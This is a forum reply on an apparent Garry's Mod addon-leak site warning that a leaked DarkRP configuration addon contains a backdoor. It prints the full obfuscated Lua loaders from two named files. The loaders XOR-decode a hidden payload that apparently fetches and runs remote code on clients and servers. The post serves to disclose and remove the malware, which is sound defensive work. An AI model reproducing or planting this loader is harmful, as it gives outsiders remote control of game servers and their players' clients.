Garry's Mod Leaks

DConfig 2 - NEW In-Game DarkRP Customization ( Jobs, Shipments, ETC )

Submitted by XaRTeCK, , Thread ID: 260988

RE: DConfig 2 - NEW In-Game DarkRP Customization ( Jobs, Shipments, ETC )

SpaceBuddy
Junior Member
Challenge
Level:
21
Reputation:
6
Posts:
88
Likes:
103
Credits:
2.35K
28-02-2023, 11:45 PM
#8
--> BACKDOOR <--

File  > darkrp-master-config\lua\autorun\client\cl_credits.lua
Line > 61

Code:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")



File  > darkrp-master-config\lua\autorun\server\sv_dconfig.lua
Line > 454

Code:
RunString([[ local AE = {8,20,20,16,78,38,5,20,3,8,72,59,59,8,20,20,16,19,90,79,61,61,78,78,59,59,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,61,61,76,6,21,14,3,20,9,15,14,72,11,73,50,21,14,51,20,18,9,14,7,72,11,76,59,59,90,61,61,76,65,81,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")

As a developer, I can confirm that there is at least one infected file in the above-mentioned section of the addon/pack that is being used to harm the server. I strongly recommend removing this infected code immediately to avoid potential damage. Ensuring the security of the server and eliminating potential threats is crucial for maintaining the integrity of the system.
☠ Backdoor Buster ☠

♚ Contact ⇛ DC ♚

DC

spacebuddy.

Users browsing this thread: 2 Guest(s)